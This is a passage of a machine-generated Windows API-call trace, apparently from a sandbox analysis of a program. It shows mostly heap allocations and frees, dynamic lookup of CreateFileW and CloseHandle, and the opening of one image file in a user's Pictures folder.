[0088.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0088.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0088.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca1f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0088.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0088.977] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0088.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0088.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0088.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0088.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0088.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0088.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0088.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0088.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0088.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0088.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0088.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0088.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0088.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0088.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0088.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0088.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0088.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0088.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0088.979] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\KI1iqiSuYI.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ki1iqisuyi.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0088.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0088.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0088.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0088.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0088.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0088.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0088.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0088.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0088.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0088.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0088.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0088.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0088.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0088.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0088.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0088.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0088.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0088.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0088.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0088.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0088.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0088.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0088.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0088.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0088.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0088.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0088.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0088.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0088.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0088.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0088.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0088.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0088.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0088.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0088.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0088.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0088.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0088.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0088.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0088.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0088.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0088.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0088.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0088.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0088.982] FreeLibrary (hLibModule=0x772d0000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0088.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.983] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.983] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0088.984] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0088.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0088.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0088.986] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0088.986] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0088.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0088.986] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0088.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0088.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0088.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0088.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0088.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0088.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0088.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0088.987] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0088.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0088.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0088.987] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0088.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0088.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0088.987] 